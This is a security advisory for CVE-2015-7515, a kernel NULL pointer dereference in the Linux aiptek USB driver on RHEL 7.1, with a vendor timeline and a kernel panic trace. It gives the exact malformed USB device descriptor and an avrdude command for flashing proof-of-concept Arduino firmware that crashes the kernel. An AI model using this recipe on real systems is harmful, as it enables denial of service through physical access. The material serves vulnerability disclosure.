Linux aiptek Nullpointer Dereference
Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: CVE-2015-7515
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS – RHEL 7.1 Kernel crashes on invalid
USB device descriptors (aiptek driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
CentOS Kernel kernel-debuginfo-3.10.0-229.
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of Advisory: https://os-s.net/advisories/
Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes when presented a buggy USB
device using the aiptek driver.
Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.
Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
(github.com/schumilo) using the following device descriptor:
[*] Device-Descriptor
bLength: 0x12
bDescriptorType: 0x1
bcdUSB: 0x200
bDeviceClass: 0x3
bDeviceSubClass: 0x0
bDeviceProtocol: 0x0
bMaxPacketSize: 0x40
idVendor: 0x458
idProduct: 0x5003
bcdDevice: 0x100
iManufacturer: 0x1
iProduct: 0x2
iSerialNumbers: 0x3
bNumConfigurations: 0x1
[*] Configuration-Descriptor
bLength: 0x9
bDescriptorType: 0x2
wTotalLength: 0x27
bNumInterfaces: 0x1
bConfigurationValue: 0x1
iConfiguration: 0x0
bmAttributes: 0x0
bMaxPower: 0x31
[*] Interface-Descriptor
bLength: 0x9
bDescriptorType: 0x4
bInterfaceNumber: 0x0
bAlternateSetting: 0x0
bNumEndpoints: 0x0
bInterfaceClass: 0x0
bInterfaceSubClass: 0x0
bInterfaceProtocol: 0x0
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x81
bmAttribut: 0x3
wMaxPacketSize: 0x404
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x1
bmAttribut: 0x2
wMaxPacketSize: 0x4
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x82
bmAttribut: 0x1
wMaxPacketSize: 0x4
bInterval: 0xc
The aiptek driver assumes that there will be at least one endpoint-descriptor.
If the interface-descriptor contains a zero-value for bNumEndpoints or no
endpoint-descriptor is provided, the driver tries to dereference a null-
pointer and the kernel crashes:
****
$ nm aiptek.ko.debug | grep aiptek_probe
0000000000001ea0 t aiptek_probe
$ addr2line -e aiptek.ko.debug 2303
/usr/src/debug/kernel-3.10.0-
****
**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/input/tablet/aiptek.
1822 endpoint = &intf->altsetting[0].endpoint[
1823
1824 /* Go set up our URB, which is called when the tablet receives
1825 * input.
1826 */
1827 usb_fill_int_urb(aiptek->urb,
1828 aiptek->usbdev,
1829 usb_rcvintpipe(aiptek->usbdev,
1830 endpoint->bEndpointAddress), /* Nullpointer-
Dereference */
1831 aiptek->data, 8, aiptek_irq, aiptek,
1832 endpoint->bInterval);
****
Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This
firmware will emulate the defective USB device.
avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
flash:w:binary.hex
The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to
connect port D3 and 3V3!
Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
only physical access to the system is required.
Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
A patch was provided on the November, 25th 2015.
References:
https://bugzilla.redhat.com/
https://bugzilla.redhat.com/
Kernel Stacktrace:
[ 622.149957] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 622.354485] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint
descriptors, different from the interface descriptor's value: 0
[ 622.386630] usb 1-1: New USB device found, idVendor=0458, idProduct=5003
[ 622.392414] usb 1-1: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[ 622.399416] usb 1-1: Product: ĉ
[ 622.404640] usb 1-1: Manufacturer: ĉ
[ 622.410079] usb 1-1: SerialNumber: %
[ 622.444650] BUG: unable to handle kernel NULL pointer dereference at
0000000000000002
[ 622.445019] IP: [<ffffffffa0395303>] aiptek_probe+0x463/0x658 [aiptek]
[ 622.445019] PGD 0
[ 622.445019] Oops: 0000 [#1] SMP
[ 622.445019] Modules linked in: aiptek(+) ip6t_rpfilter ip6t_REJECT
ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc
ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6
nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter
ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat
nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter
ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper
drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c
sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix
libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 622.445019] CPU: 0 PID: 2242 Comm: systemd-udevd Not tainted
3.10.0-229.14.1.el7.x86_64 #1
[ 622.445019] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 622.445019] task: ffff88000e65a220 ti: ffff88000f4cc000 task.ti: ffff88000f4cc000
[ 622.445019] RIP: 0010:[<ffffffffa0395303>] [<ffffffffa0395303>]
aiptek_probe+0x463/0x658 [aiptek]
[ 622.445019] RSP: 0018:ffff88000f4cfb80 EFLAGS: 00010286
[ 622.445019] RAX: 0000000000000000 RBX: ffff88000bd67800 RCX: ffff88000bcd0800
[ 622.445019] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffff88000ca29000
[ 622.445019] RBP: ffff88000f4cfbe0 R08: 0000000000000000 R09: 0000000000000000
[ 622.445019] R10: ffff88000e401400 R11: ffffffff810020d8 R12: ffff88000c525800
[ 622.445019] R13: ffff88000c525830 R14: ffff88000bcd1800 R15: ffff88000bd67834
[ 622.445019] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
knlGS:0000000000000000
[ 622.445019] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 622.445019] CR2: 0000000000000002 CR3: 000000000d67f000 CR4:
00000000000006f0
[ 622.445019] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 622.445019] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 622.445019] Stack:
[ 622.445019] ffff88000bcd0800 0000000000000001 0000019000000246
0000019000000032
[ 622.445019] 0000006400000019 0000012c000000c8 000000000cc3e092
ffff88000bcd0890
[ 622.445019] ffff88000bcd0800 ffffffffa0397068 ffff88000c525830 ffffffffa03965c0
[ 622.445019] Call Trace:
[ 622.445019] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/
[ 622.445019] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 622.445019] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 622.445019] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 622.445019] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 622.445019] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 622.445019] [<ffffffff813d2680>] bus_add_driver+0x200/0x2d0
[ 622.445019] [<ffffffff813d3b34>] driver_register+0x64/0xf0
[ 622.445019] [<ffffffff8141c1c2>] usb_register_driver+0x82/0x160
[ 622.445019] [<ffffffffa039a000>] ? 0xffffffffa0399fff
[ 622.445019] [<ffffffffa039a01e>] aiptek_driver_init+0x1e/0x1000 [aiptek]
[ 622.445019] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 622.445019] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 622.445019] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 622.445019] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+
[ 622.445019] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 622.445019] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 622.445019] Code: 45 31 c9 45 31 c0 b9 ff 03 00 00 be 08 00 00 00 4c 89 f7
e8 90 39 0d e1 49 8b 04 24 48 8b 4b 08 48 8b bb 10 01 00 00 48 8b 40 18 <0f>
b6 50 02 0f b6 70 06 8b 01 c1 e2 0f c1 e0 08 81 ca 80 00 00
[ 622.445019] RIP [<ffffffffa0395303>] aiptek_probe+0x463/0x658 [aiptek]
[ 622.445019] RSP <ffff88000f4cfb80>
[ 622.445019] CR2: 0000000000000002
[ 622.860772] ---[ end trace b239663354a1c556 ]---
[ 622.864813] Kernel panic - not syncing: Fatal exception
[ 622.865768] drm_kms_helper: panic occurred, switching back to text console
Komentarų nėra:
Rašyti komentarą